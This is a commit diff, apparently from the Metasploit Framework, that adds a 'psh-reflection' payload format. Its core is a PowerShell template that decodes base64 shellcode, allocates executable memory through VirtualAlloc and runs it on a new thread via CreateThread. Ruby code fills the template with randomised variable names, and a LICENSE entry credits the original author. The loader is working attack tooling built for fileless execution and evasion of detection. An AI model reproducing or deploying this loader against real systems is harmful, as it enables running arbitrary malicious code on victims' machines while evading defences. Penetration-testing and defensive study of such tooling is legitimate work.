Landing #2767, @Meatballs1 Powershell Reflective Payload
commit
3299b68adf
4
LICENSE
4
LICENSE
|
@ -15,6 +15,10 @@ License: BSD-3-clause
|
|||
# Last updated: 2013-Nov-04
|
||||
#
|
||||
|
||||
Files: data/templates/to_mem_pshreflection.ps1.template
|
||||
Copyright: 2012, Matthew Graeber
|
||||
License: BSD-3-clause
|
||||
|
||||
Files: data/john/*
|
||||
Copyright: 1996-2011 Solar Designer.
|
||||
License: GPL-2
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
function %{func_get_proc_address} {
|
||||
Param ($%{var_module}, $%{var_procedure})
|
||||
$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
|
||||
|
||||
return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
|
||||
}
|
||||
|
||||
function %{func_get_delegate_type} {
|
||||
Param (
|
||||
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
|
||||
[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
|
||||
)
|
||||
|
||||
$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
|
||||
$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
|
||||
$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
|
||||
|
||||
return $%{var_type_builder}.CreateType()
|
||||
}
|
||||
|
||||
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
||||
|
||||
$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
|
||||
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
|
||||
|
||||
$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
|
||||
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
|
|
@ -782,7 +782,7 @@ require 'msf/core/exe/segment_injector'
|
|||
return read_replace_script_template("to_exe.vba.template", hash_sub)
|
||||
end
|
||||
|
||||
def self.to_vba(framework,code,opts={})
|
||||
def self.to_vba(framework,code,opts={})
|
||||
hash_sub = {}
|
||||
hash_sub[:var_myByte] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
|
||||
hash_sub[:var_myArray] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
|
||||
|
@ -920,6 +920,33 @@ def self.to_vba(framework,code,opts={})
|
|||
return read_replace_script_template("to_mem_old.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
|
||||
end
|
||||
|
||||
#
|
||||
# Reflection technique prevents the temporary .cs file being created for the .NET compiler
|
||||
# Tweaked by shellster
|
||||
# Originally from PowerSploit
|
||||
#
|
||||
def self.to_win32pe_psh_reflection(framework, code, opts={})
|
||||
# Intialize rig and value names
|
||||
rig = Rex::RandomIdentifierGenerator.new()
|
||||
rig.init_var(:func_get_proc_address)
|
||||
rig.init_var(:func_get_delegate_type)
|
||||
rig.init_var(:var_code)
|
||||
rig.init_var(:var_module)
|
||||
rig.init_var(:var_procedure)
|
||||
rig.init_var(:var_unsafe_native_methods)
|
||||
rig.init_var(:var_parameters)
|
||||
rig.init_var(:var_return_type)
|
||||
rig.init_var(:var_type_builder)
|
||||
rig.init_var(:var_buffer)
|
||||
rig.init_var(:var_hthread)
|
||||
|
||||
hash_sub = rig.to_h
|
||||
|
||||
hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
|
||||
|
||||
return read_replace_script_template("to_mem_pshreflection.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
|
||||
end
|
||||
|
||||
def self.to_win32pe_vbs(framework, code, opts={})
|
||||
to_exe_vbs(to_win32pe(framework, code, opts), opts)
|
||||
end
|
||||
|
@ -1712,6 +1739,9 @@ def self.to_vba(framework,code,opts={})
|
|||
|
||||
when 'psh-net'
|
||||
output = Msf::Util::EXE.to_win32pe_psh_net(framework, code, exeopts)
|
||||
|
||||
when 'psh-reflection'
|
||||
output = Msf::Util::EXE.to_win32pe_psh_reflection(framework, code, exeopts)
|
||||
|
||||
end
|
||||
|
||||
|
@ -1735,6 +1765,7 @@ def self.to_vba(framework,code,opts={})
|
|||
"msi-nouac",
|
||||
"psh",
|
||||
"psh-net",
|
||||
"psh-reflection",
|
||||
"vba",
|
||||
"vba-exe",
|
||||
"vbs",
|
||||
|
|
Loading…
Reference in New Issue